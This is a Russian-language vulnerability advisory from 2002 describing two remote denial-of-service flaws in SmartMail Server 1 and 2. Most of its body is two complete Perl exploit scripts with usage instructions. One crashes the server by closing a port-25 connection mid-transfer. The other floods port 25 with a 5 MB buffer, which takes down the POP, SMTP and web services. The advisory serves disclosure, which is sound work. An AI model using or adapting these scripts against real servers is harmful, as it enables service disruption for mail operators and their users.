Security Lab

DoS против SmartMail Server

Дата публикации:01.11.2002
Всего просмотров:1212
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: SmartMail Server 1
SmartMail Server 2
Описание: SmartMail Server () – полнофункциональный почтовый сервер для Windows. В программе обнаружено 2 возможности удаленной DoS атаки.

1. Закрытие подключения во время передачи данных вызовет ошибку "Access violations at address 0046CBCC i module 'smartsvr.exe' write of address 76756f4e ". Эксплоит:

#!/usr/bin/perl -w
# greetz: marocit and #crack.fr (christal)
# securma@caramail.com
use Socket;
if (not $ARGV[0]) {
	print qq~
 		Usage: sm.pl <host>
	~; 
exit;}

$ip=$ARGV[0];
print "SmartMail server 2.0 DoS\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("MASSINE");
sub sendexplt {
 my ($pstr)=@_; 
	$target= inet_aton($ip) || die("inet_aton 
problems");
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,25,$target)){
 select(S); 
		$|=1;
 print $pstr; 
 sleep 3;
	 close(S); 
 } else { die("Can't connect...\n"); }
}
2. Посылка 5MG of dated к 25 и 110 порту приведет к завершению работы всех служб (pop/smtp/webinterface).
#!/usr/bin/perl -w
# tool smartdos.pl
# securma@caramail.com
# Greetz: marocit and #crack.fr (specialement christal.)
# 
use IO::Socket;
if ($#ARGV<0)
{
 print "\n write the target IP!\n\n";
 exit;
}
$buffer = "A"x 5099999 ;
$connect = IO::Socket::INET ->new (Proto=>"tcp", 
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer";
print "\nsending exploit......\n\n"; 
Ссылки: SmartMail server DOS